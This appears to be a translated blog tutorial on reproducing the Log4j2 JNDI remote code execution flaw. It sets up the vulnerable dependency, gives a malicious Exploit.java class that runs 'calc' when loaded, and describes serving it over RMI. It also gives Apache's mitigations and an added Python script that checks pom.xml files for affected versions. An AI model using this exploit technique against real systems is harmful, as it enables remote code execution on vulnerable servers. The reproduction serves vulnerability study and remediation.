Teach you to reproduce log4j2 nuclear weapon level vulnerability hand in hand
2022-07-19 05:20:00 [dafeng2773]
Brief introduction
In recent days, details of a remote code execution vulnerability in Apache Log4j were disclosed. Once exploited by an attacker, the vulnerability causes serious harm. After rapid analysis and confirmation, the vulnerability was found to affect an extremely wide range of systems and to be extremely severe; it is recommended to start emergency response and remediate immediately.
Summary of vulnerability
Apache Log4j2 is an open-source Java logging tool, and a large number of business frameworks use this component. The vulnerability lies in the lookup function provided by Log4j2, which lets developers read configuration from the corresponding environment through certain protocols. In its implementation the input is not strictly validated, which is what gives rise to the vulnerability.
Scope
Apache Log4j 2.x <= 2.15.0-rc1
Reproducing the vulnerability
1. Environment setup
Create a new Maven project and import the Log4j dependencies:
<dependencies>
    <dependency>
        <groupId>org.apache.logging.log4j</groupId>
        <artifactId>log4j-api</artifactId>
        <version>2.11.0</version>
    </dependency>
    <dependency>
        <groupId>org.apache.logging.log4j</groupId>
        <artifactId>log4j-core</artifactId>
        <version>2.11.0</version>
    </dependency>
</dependencies>
2. Exploit: test with Log4jTest.java
3. Compile a malicious class, Exploit.class
First create Exploit.java and compile it to a class file.
class Exploit {
    // Static initializer: runs as soon as the class is loaded
    static {
        System.err.println("Evil has been there");
        try {
            String cmds = "calc";
            Runtime.getRuntime().exec(cmds);
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}
4. The attacker creates an RMI service, binds Exploit to it, and starts it listening on port 1099.
5. Run Log4jTest.java: the malicious class is fetched and the "calc" command is executed.
Fix
Apache has already released a new version that fixes the vulnerability. Users are advised to carry out a self-inspection as soon as possible and upgrade to the latest version in time:
https://github.com/apache/logging-log4j2/releases/tag/log4j-2.15.0-rc2
At the same time, the following temporary measures are recommended to prevent exploitation:
1. Add the JVM startup parameter -Dlog4j2.formatMsgNoLookups=true;
2. Add a log4j2.component.properties configuration file to the application classpath, with the content log4j2.formatMsgNoLookups=true;
3. Use JDK 11.0.1, 8u191, 7u201, 6u211 or later;
4. Deploy a third-party firewall product for additional protection.
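As an added example (not code from the original post), here is a small self-inspection script in Python: it reads a project's pom.xml, finds the log4j-core dependency and compares its version against the affected range quoted above, ordering release candidates before the final release so that 2.15.0-rc1 is flagged while 2.15.0-rc2 is not. The embedded SAMPLE_POM is constructed for the demonstration.

```python
import re
import xml.etree.ElementTree as ET

# Affected range stated in this advisory: Apache Log4j 2.x <= 2.15.0-rc1
AFFECTED_MAX = "2.15.0-rc1"

# Constructed sample pom.xml with the log4j-core dependency used in the reproduction
SAMPLE_POM = """<project xmlns="http://maven.apache.org/POM/4.0.0">
  <dependencies>
    <dependency>
      <groupId>org.apache.logging.log4j</groupId>
      <artifactId>log4j-core</artifactId>
      <version>2.11.0</version>
    </dependency>
  </dependencies>
</project>"""


def parse_version(text):
    """'2.15.0-rc1' -> ((2, 15, 0), (0, 1)); a final release sorts after its rcs.
    Only the 'X.Y.Z' and 'X.Y.Z-rcN' forms quoted in this advisory are handled."""
    m = re.fullmatch(r"(\d+(?:\.\d+)*)(?:-rc(\d+))?", text.strip())
    if not m:
        raise ValueError(f"unrecognised version string: {text!r}")
    nums = tuple(int(p) for p in m.group(1).split("."))
    nums += (0,) * (3 - len(nums))  # pad so that 2.11 compares as 2.11.0
    rc = m.group(2)
    return nums, ((0, int(rc)) if rc else (1, 0))  # (0, n) = rcN, (1, 0) = final


def is_affected(version):
    """True when the version is on the 2.x line and not newer than AFFECTED_MAX."""
    parsed = parse_version(version)
    return parsed[0][0] == 2 and parsed <= parse_version(AFFECTED_MAX)


def audit_pom(pom_xml):
    """Return [(version, affected)] for each log4j-core dependency declared in the POM."""
    findings = []
    for dep in ET.fromstring(pom_xml).iter():
        if dep.tag.rsplit("}", 1)[-1] != "dependency":  # strip the Maven XML namespace
            continue
        fields = {c.tag.rsplit("}", 1)[-1]: (c.text or "").strip() for c in dep}
        if (fields.get("groupId") == "org.apache.logging.log4j"
                and fields.get("artifactId") == "log4j-core"):
            version = fields.get("version")  # None when managed via dependencyManagement
            findings.append((version, is_affected(version) if version else None))
    return findings
```

Transitive dependencies never appear in pom.xml, so run the same comparison over the output of mvn dependency:tree or over the jar names on the deployed classpath, and check the range against the current Apache advisory rather than only the one quoted here.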
Reference links:
https://www.bilibili.com/video/BV1FL411E7g3
https://mp.weixin.qq.com/s/AqbGHYHLhRemxmroi2W6Iw
Technical discussion
The source code is posted in the comment section.
Reposts, bookmarks, likes and support are welcome!